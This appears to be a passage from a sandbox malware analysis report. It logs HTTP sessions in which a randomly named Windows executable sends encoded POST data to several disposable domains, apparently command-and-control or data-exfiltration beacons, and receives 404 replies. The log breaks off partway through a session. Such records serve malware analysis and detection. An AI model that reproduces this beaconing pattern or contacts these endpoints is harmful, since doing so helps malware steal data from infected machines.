Oct 24, 2024 05:07:29.053287983 CEST | 531 | OUT | GET /o7wc/?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB HTTP/1.1
Host: www.heeraka.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:07:29.688046932 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB"}</script></head></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.4 | 49938       | 161.97.168.245 | 80               | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe

Timestamp                            | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:34.772094965 CEST | 804               | OUT       | POST /53bw/ HTTP/1.1
Host: www.awesomearv.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.awesomearv.buzz
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Referer: http://www.awesomearv.buzz/53bw/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=/4cWAqWMo/5YOhDpPkiscA4upK1ctZtHl6J/Du9Gci2JB3pyFiTfAYW0QbfM3L5K01d4Po5b6bmerhaMm+7WQoAx80E0VPtTnX2DOFjW50jjlmjAPFZq194BbMh7Wm1gM0z4ZYlv2Vxg2xsvA19ybe7sZiKbSiD7pfgRzxfAe5EbPWms+xumZn4eKteXU0LNiQ==
Oct 24, 2024 05:07:35.644646883 CEST | 1236              | IN        | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 24 Oct 2024 03:07:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cd104a-b96"
Content-Encoding: gzip
Data: (gzip-compressed, chunked HTML body; binary, not reproduced here)
Oct 24, 2024 05:07:35.644709110 CEST | 370               | IN        | Data: (continuation of the gzip-compressed body; binary, not reproduced here)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.4 | 49953       | 161.97.168.245 | 80               | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe

Timestamp                            | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:37.308964968 CEST | 824               | OUT       | POST /53bw/ HTTP/1.1
Host: www.awesomearv.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.awesomearv.buzz
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Referer: http://www.awesomearv.buzz/53bw/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwSJBWZyCgrfHYW0FrfNq75/01YFPqtb6fGerleMmJPVQ4AzxUElbvtTnX2DOFe750rjkXzAPhFp/d4CPch7Sm1kM0zWZYVB2XZg2xcvRE9zBO7udiLtUgysnMxy+hLfRqANKQ32vAPxLnctXqXjZ32E5Rn+TejU1lwgGG//bFslEc8=
Oct 24, 2024 05:07:38.176356077 CEST | 1236              | IN        | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 24 Oct 2024 03:07:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cd104a-b96"
Content-Encoding: gzip
Data: (gzip-compressed, chunked HTML body; binary, not reproduced here)
Oct 24, 2024 05:07:38.176409960 CEST | 370               | IN        | Data: (continuation of the gzip-compressed body; binary, not reproduced here)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.4 | 49967       | 161.97.168.245 | 80               | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe

Timestamp                            | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:39.856246948 CEST | 10906             | OUT       | POST /53bw/ HTTP/1.1
Host: www.awesomearv.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.awesomearv.buzz
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
Referer: http://www.awesomearv.buzz/53bw/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=… [TRUNCATED]
Oct 24, 2024 05:07:40.712903976 CEST | 1236              | IN        | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 24 Oct 2024 03:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cd104a-b96"
Content-Encoding: gzip
Data: (gzip-compressed, chunked HTML body; binary, not reproduced here)
Oct 24, 2024 05:07:40.712956905 CEST | 370               | IN        | Data: (continuation of the gzip-compressed body; binary, not reproduced here)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.4 | 49983       | 161.97.168.245 | 80               | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe

Timestamp                            | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:42.399188042 CEST | 534               | OUT       | GET /53bw/?Znyl=2rnxDB&Qzj=y602DfOxy8k4aDGeL32BfjMr8rtJj4VEvf5zKPNxBw/5ZQtnSgrsDIShG/LT94BV3SRTeLh29bGmgRGfpvfkbNV5yHp9DO9ljl/7OAHX9kTVnWn3IiM7pPI= HTTP/1.1
Host: www.awesomearv.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:07:43.225492954 CEST | 1236              | IN        | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 24 Oct 2024 03:07:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cd104a-b96"
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Oct 24, 2024 05:07:43.225532055 CEST | 212               | IN        | Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
Oct 24, 2024 05:07:43.225567102 CEST | 1236              | IN        | Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
Oct 24, 2024 05:07:43.225600004 CEST | 486               | IN        | Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oop


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.45001165.21.196.90805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 24, 2024 05:07:48.550262928 CEST  798                OUT        POST /2ncs/ HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.030002252.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.030002252.xyz/2ncs/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 74 38 53 45 52 52 35 6f 65 32 71 34 74 45 4f 34 34 33 76 76 55 33 69 6c 67 39 50 63 55 42 75 30 2b 45 59 6c 62 75 68 76 36 72 6c 4e 6b 66 4d 49 76 4a 49 51 49 51 39 56 54 49 49 31 39 50 4a 6a 66 54 4b 4a 4c 61 59 2f 69 51 67 4f 45 6c 44 34 47 76 44 5a 4e 33 72 49 6c 6e 47 67 4e 73 37 39 57 7a 46 72 4c 33 70 48 73 35 47 50 57 2b 6c 63 68 37 35 79 69 55 30 48 64 50 41 34 4d 45 53 58 43 36 6a 69 43 71 42 39 30 30 59 6e 72 6c 6f 56 6e 78 50 65 4f 55 72 57 6c 33 36 4d 79 63 65 33 56 53 6b 72 46 4d 48 2f 5a 73 45 55 2b 66 36 52 52 63 4c 41 4e 77 3d 3d
                                                                                                                    Data Ascii: Qzj=P/ZYkjLBUYEvt8SERR5oe2q4tEO443vvU3ilg9PcUBu0+EYlbuhv6rlNkfMIvJIQIQ9VTII19PJjfTKJLaY/iQgOElD4GvDZN3rIlnGgNs79WzFrL3pHs5GPW+lch75yiU0HdPA4MESXC6jiCqB900YnrloVnxPeOUrWl36Myce3VSkrFMH/ZsEU+f6RRcLANw==
Oct 24, 2024 05:07:49.376538038 CEST  1032               IN         HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 24 Oct 2024 03:07:49 GMT
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP    Destination Port  PID   Process
10          192.168.2.4  50012        65.21.196.90      80                5568  C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 24, 2024 05:07:51.169250011 CEST  818                OUT        POST /2ncs/ HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.030002252.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.030002252.xyz/2ncs/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 43 30 39 67 63 6c 56 50 68 76 33 4c 6c 4e 72 2f 4d 4a 67 70 49 58 49 51 42 64 54 4b 63 31 39 50 4e 6a 66 57 75 4a 4c 4a 41 67 67 41 67 49 4d 46 44 36 62 2f 44 5a 4e 33 72 49 6c 6a 57 61 4e 73 54 39 58 43 31 72 4b 56 4e 47 6b 5a 47 49 52 2b 6c 63 6c 37 35 32 69 55 31 51 64 4f 63 53 4d 47 71 58 43 34 72 69 43 34 70 2b 2b 30 59 68 30 56 70 36 6a 51 71 77 45 6b 4c 63 75 32 36 52 36 2b 6e 53 55 55 31 78 55 39 6d 6f 4c 73 67 6e 6a 59 7a 6c 63 66 32 4a 57 37 4b 30 44 41 73 32 6d 39 4f 63 39 6d 45 74 6e 42 75 71 4e 62 49 3d
                                                                                                                    Data Ascii: Qzj=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1C09gclVPhv3LlNr/MJgpIXIQBdTKc19PNjfWuJLJAggAgIMFD6b/DZN3rIljWaNsT9XC1rKVNGkZGIR+lcl752iU1QdOcSMGqXC4riC4p++0Yh0Vp6jQqwEkLcu26R6+nSUU1xU9moLsgnjYzlcf2JW7K0DAs2m9Oc9mEtnBuqNbI=
Oct 24, 2024 05:07:51.965693951 CEST  1032               IN         HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 24 Oct 2024 03:07:51 GMT
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP    Destination Port  PID   Process
11          192.168.2.4  50013        65.21.196.90      80                5568  C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 24, 2024 05:07:53.725924015 CEST  10900              OUT        POST /2ncs/ HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.030002252.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.030002252.xyz/2ncs/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 4b 30 2b 54 45 6c 61 4d 4a 76 32 4c 6c 4e 31 76 4d 4d 67 70 4a 4c 49 51 5a 5a 54 4b 52 49 39 4d 35 6a 63 77 79 4a 63 73 73 67 71 41 67 49 4f 46 44 6e 47 76 44 49 4e 32 62 4d 6c 6e 4b 61 4e 73 54 39 58 41 74 72 44 6e 70 47 70 35 47 50 57 2b 6c 51 68 37 35 65 69 56 63 6c 64 4f 6f 6f 50 33 4b 58 43 59 37 69 41 4c 42 2b 6a 45 59 6a 33 56 70 69 6a 51 57 7a 45 6e 75 6a 75 32 4f 72 36 39 37 53 58 68 4d 78 54 4f 37 33 52 39 34 46 78 4c 4c 76 51 4e 4b 72 56 35 4f 48 4c 41 78 6a 35 38 6d 7a 78 47 4a 35 79 78 37 73 51 37 31 4c 2f 48 45 63 32 62 77 4d 41 30 36 52 48 43 76 35 58 74 68 55 32 54 54 68 76 78 78 47 73 34 32 52 7a 48 69 63 6e 30 71 2f 32 62 39 6e 6f 36 4c 77 46 79 39 6e 44 63 57 30 4d 70 73 4f 57 31 65 4d 78 2b 4b 78 6c 79 78 4c 76 42 4b 77 59 6d 37 6b 5a 47 2b 41 67 4a 55 53 6b 48 62 44 59 47 69 71 4e 74 30 38 69 45 78 42 58 6e 33 44 67 70 47 4c 64 65 43 70 45 79 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1K0+TElaMJv2LlN1vMMgpJLIQZZTKRI9M5jcwyJcssgqAgIOFDnGvDIN2bMlnKaNsT9XAtrDnpGp5GPW+lQh75eiVcldOooP3KXCY7iALB+jEYj3VpijQWzEnuju2Or697SXhMxTO73R94FxLLvQNKrV5OHLAxj58mzxGJ5yx7sQ71L/HEc2bwMA06RHCv5XthU2TThvxxGs42RzHicn0q/2b9no6LwFy9nDcW0MpsOW1eMx+KxlyxLvBKwYm7kZG+AgJUSkHbDYGiqNt08iExBXn3DgpGLdeCpEyI0Xu5lt6jUR8+ZK4bZaMX5aHF0os22chCcvNjPqX890mktlUxg9aM+RfnCVVSkh3x11Ma8L7wcgurpfczxJZbPHlZdZjlna6lgqiZBqtzlkS7M15sL+PDhmwrG7wSGszemkSapnk0EQvI2BOgnx1kqnW7F/81Zir1RV8maK0CIcCOyyirbKT3vQjAoXSakLNxNtfaIjo4kkjK5Flf1WHAfSI2yWk53NtlIUWAudXv5AT38Xd1DepZAfz4YaMQYlmjqaipRlZCslAzfu0prp9kckziLLVehPl86p+YhRQKVLHDDNom8DYPxvN/56q9kaA6YONX8zSdxSffEdNP9myF4hB0c7lpwEANq1v8dFRFOYaiSUVZU1FWCxOhJwKkguhXTyrbQs307af5YSSbT6bae5Nrj9jRr/v2FBQXx60819k/p8LNH5AIgz4kN8IAKrs0gXgZyj4UC0dz6qiODJpU9tJqWSZtig5Tbbh+LRt/KOLOj6xLO5UHSzBEeSTsOhV3o43SMJNxz195cTsnCIZl6wrSk8FkXXaZw1ULHCvaF/RIPVI4WdzMSGlqkM++8EoSWOA/iIfCQHH7leN+SIh7i9h83Wd8nspdaEqA4wf4moGsCqaJEOxMpsnCYckOftkCZoo9zVIRHg2Uni+dWvIZniWLc7DYHTVoi [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP    Destination Port  PID   Process
12          192.168.2.4  50014        65.21.196.90      80                5568  C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 24, 2024 05:07:56.262965918 CEST  532                OUT        GET /2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfepEWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:07:57.147090912 CEST  1032               IN         HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 24 Oct 2024 03:07:57 GMT
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP    Destination Port  PID   Process
13          192.168.2.4  50015        107.148.177.200   80                5568  C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 24, 2024 05:08:03.102500916 CEST  786                OUT        POST /ynjl/ HTTP/1.1
                                                                                                                    Host: www.60881.xyz
